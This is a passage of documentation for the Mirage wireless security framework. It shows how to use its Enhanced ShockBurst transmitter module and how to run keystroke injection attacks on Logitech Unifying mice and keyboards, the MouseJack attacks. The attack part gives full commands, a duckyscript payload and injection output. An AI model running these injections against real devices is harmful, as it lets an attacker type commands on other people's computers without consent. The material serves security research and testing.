[PTX|98|E8:46:F9:2F:A4]:

You can automatically find the PRX using the find_prx command :

[PTX|98|E8:46:F9:2F:A4]: find_prx
[SUCCESS] ACK received from PRX on channel #8
[PTX| 8|E8:46:F9:2F:A4]:

Or you can also manually set the channel using channel command :

[PTX| 8|E8:46:F9:2F:A4]: channel 23
[PTX|23|E8:46:F9:2F:A4]:

You can enable the follow mode using follow_prx command:

[PTX|23|E8:46:F9:2F:A4]: follow_prx
[PTX| 8|E8:46:F9:2F:A4]:

and disable it using unfollow_prx:

[PTX| 8|E8:46:F9:2F:A4]: unfollow_prx
[PTX| 8|E8:46:F9:2F:A4]:

Finally, you can easily transmit payloads using send:

[PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f
[SUCCESS] ACK received.
[PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f,1122,3344
[SUCCESS] ACK received.
[SUCCESS] ACK received.
[SUCCESS] ACK received.

Customizing the behaviour using scenarios

If you want to use a scenario, you can use the create_scenario command in order to generate a basic code :

$ mirage --create_scenario
[QUESTION] Scenario's name : esb_ptx_test
[SUCCESS] Scenario master_test successfully generated : /home/user/.mirage/scenarios/esb_ptx_test.py
[INFO] Mirage process terminated !

Then, you can modify the code as you want.

If you want to use this scenario, just provide its name as the value of the input parameter SCENARIO :

$ sudo mirage esb_ptx SCENARIO=esb_ptx_test
[INFO] Module esb_ptx loaded !
[INFO] Scenario loaded !
[...]
[INFO] Mirage process terminated !

Performing keystrokes injection attacks

Two main scenarios are provided, allowing to easily perform the unencrypted and encrypted keystrokes injection attacks targeting Logitech mices and keyboards described in MouseJack whitepaper:

  • logitech_unencrypted_keystrokes_injection: This scenario allows to inject unencrypted keystrokes to a wireless mouse address, bypassing the encryption.

  • logitech_encrypted_keystrokes_injection: This scenario allows to inject forged encrypted keystrokes by exploiting a weakness in the AES implementation of Logitech Unifying.

These scenarios can be used by providing them as a scenario to the module. They can be used in three modes :

If you want to inject a simple text, provide a new parameter named TEXT to the module:

$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection TEXT=bonjour
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Text injection: bonjour
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
bonjour

If you want to perform a more complex keystrokes injection, you can provide a duckyscript file:

$ cat > /tmp/duck.ducky
DELAY 1000
ALT F2
DELAY 1000
STRING firefox https://homepages.laas.fr/rcayre/mirage-documentation
DELAY 1000
ENTER
$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection DUCKYSCRIPT=/tmp/duck.ducky
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Duckyscript injection: /tmp/duck.ducky
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
[INFO] Terminating scenario ...
[INFO] Mirage process terminated !

Finally, you can also use the interactive mode in order to directly interact with the target computer:

$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection INTERACTIVE=yes
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Interactive mode
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
[INFO] Injecting:b
[INFO] Injecting:o
[INFO] Injecting:n
[INFO] Injecting:j
[INFO] Injecting:o
[INFO] Injecting:u
[INFO] Injecting:r
[...]